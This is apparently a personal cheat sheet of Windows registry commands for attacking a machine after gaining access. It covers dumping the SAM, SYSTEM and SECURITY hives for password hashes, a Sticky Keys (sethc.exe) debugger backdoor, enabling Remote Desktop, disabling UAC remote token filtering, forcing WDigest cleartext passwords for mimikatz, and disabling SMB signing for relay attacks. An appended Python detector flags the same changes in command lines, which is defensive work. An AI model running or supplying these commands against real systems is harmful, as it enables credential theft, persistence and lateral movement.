Common Windows Commands
Kept only as a backup.
dump hive hash
save the SAM, SYSTEM and SECURITY hives (local account hashes) to .hive files.
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
open port 3389
enable Remote Desktop with one command.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
sethc hijacking
Sticky Keys (Shift) backdoor.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
disable uac policy
allow remote administrative access for local administrator accounts other than the built-in Administrator.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
store cleartext passwords in lsass
for mimikatz on Server 2012.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
disable smb signing
for SMB relay attacks.
reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /f
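
A detection-side example added here, not part of the original notes: it matches process-creation command lines against the reg.exe changes listed on this page, normalising quoting, the HKEY_LOCAL_MACHINE alias, ControlSet numbering and DWORD notation. The rule labels, function names and sample lines are constructed for this example.

```python
import re

# (label, reg verb, key regex, value name, data); None = any. Keys and values come from
# the commands above; the labels are names made up for this example.
RULES = [
    ("hive_dump", "save", r"^hklm\\(sam|system|security)$", None, None),
    ("rdp_enabled", "add", r"\\control\\terminal server$", "fdenytsconnections", 0),
    ("sethc_debugger", "add", r"\\image file execution options\\sethc\.exe$", "debugger", None),
    ("uac_remote_filter_off", "add", r"\\policies\\system$", "localaccounttokenfilterpolicy", 1),
    ("wdigest_cleartext", "add", r"\\securityproviders\\wdigest$", "uselogoncredential", 1),
    ("smb_signing_optional", "add", r"\\lanmanserver\\parameters$", "requiresecuritysignature", 0),
]

def split_args(cmdline):
    # Simplified Windows argv split: a double quote toggles quoting anywhere in a word,
    # so a key quoted as a whole and one quoted only around its space compare equal.
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]|"[^"]*"?)+', cmdline)]

def as_int(text):
    # reg.exe accepts decimal or 0x-prefixed REG_DWORD data; anything else is None.
    try:
        return int(text, 16 if text.startswith("0x") else 10)
    except ValueError:
        return None

def classify(cmdline):
    # Return the label of the first matching rule for a reg.exe command line, else None.
    args = [a.lower() for a in split_args(cmdline)]
    if len(args) < 3 or not re.fullmatch(r"(.*\\)?reg(\.exe)?", args[0]):
        return None
    key = re.sub(r"^hkey_local_machine", "hklm", args[2].rstrip("\\"))
    opts = {args[i]: args[i + 1] for i in range(3, len(args) - 1) if args[i] in ("/v", "/d")}
    for label, verb, key_re, value, data in RULES:
        if (args[1] == verb and re.search(key_re, key) and value in (None, opts.get("/v"))
                and data in (None, as_int(opts.get("/d", "")))):
            return label
    return None

SAMPLES = [  # constructed command lines, not real telemetry
    r'reg save hklm\sam sam.hive',
    r'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /d 0 /f',
    r'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /d 1 /f',
    r'reg add HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest /v UseLogonCredential /d 0x1',
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "no match", "<-", line)
```

The third sample sets fDenyTSConnections back to 1, which turns Remote Desktop off again, so it is deliberately not flagged.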